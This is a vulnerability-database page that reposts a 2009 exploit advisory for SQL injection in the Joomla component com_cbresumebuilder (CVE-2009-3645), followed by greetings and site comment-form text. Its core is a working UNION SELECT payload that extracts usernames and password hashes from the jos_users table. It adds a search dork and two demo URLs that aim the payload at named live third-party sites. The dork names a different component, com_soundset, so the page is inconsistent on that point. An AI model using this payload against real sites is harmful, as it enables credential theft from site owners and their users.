Joomla Component com_cbresumebuilder (group_id) Remote SQL Injection Vulnerability

2009.10.12

Credit: kaMtiEz

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-3645

CWE: CWE-89

Dork: inurl:\"com_soundset\"

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

/**************************************************************************
[~] Joomla Component com_cbresumebuilder Remote SQL injection vulnerability - (group_id)
[~] Author : kaMtiEz (kamzcrew@gmail.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : October 5, 2009
[~] Tune In : http://antisecradio.fm (choose your weapon)
**************************************************************************/
[ Software Information ]
[+] Vendor : http://www.joomlacache.com/
[+] Download : http://www.joomlacache.com/index.php?option=com_ambrasubs&controller=subscription&task=new&id=6
[+] version : -
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_soundset"
[+] Price : $49.95-- USD
===========================================================================
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_cbresumebuilder&task=group_members&group_id=[INDONESIANCODER]
[ Exploit ]
-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--
[ Demo ]
http://www.gruenderwelt.org/index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--
http://made4joomla.com/test/index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--
===========================================================================
[ Thx TO ]
[+] INDONESIAN CODER TEAM - KILL-9 CREW - KIRIK CREW - MainHack Brotherhood - ServerIsDown
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, och3_an3h
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s ,rendy, Jack- and YOU!!
[ NOTE ]
[+] Mom and dad i love u .. for my girlfriends thx for your support mwahhhh ^_^
[+] terima kasih banget buat tukulesto dan arianom yang setiap malam menemani saya waktu exploit .. wkwkwkw
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D
[ QUOTE ]
[+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih eh kok malah kesasar wkwkw ....
[+] AURAKASIH where did you go ??

Referencje:

http://www.securityfocus.com/bid/36598

http://secunia.com/advisories/36954

http://packetstormsecurity.org/0910-exploits/joomlacbrb-sql.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_cbresumebuilder (group_id) Remote SQL Injection Vulnerability

Dork: inurl:\"com_soundset\"

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.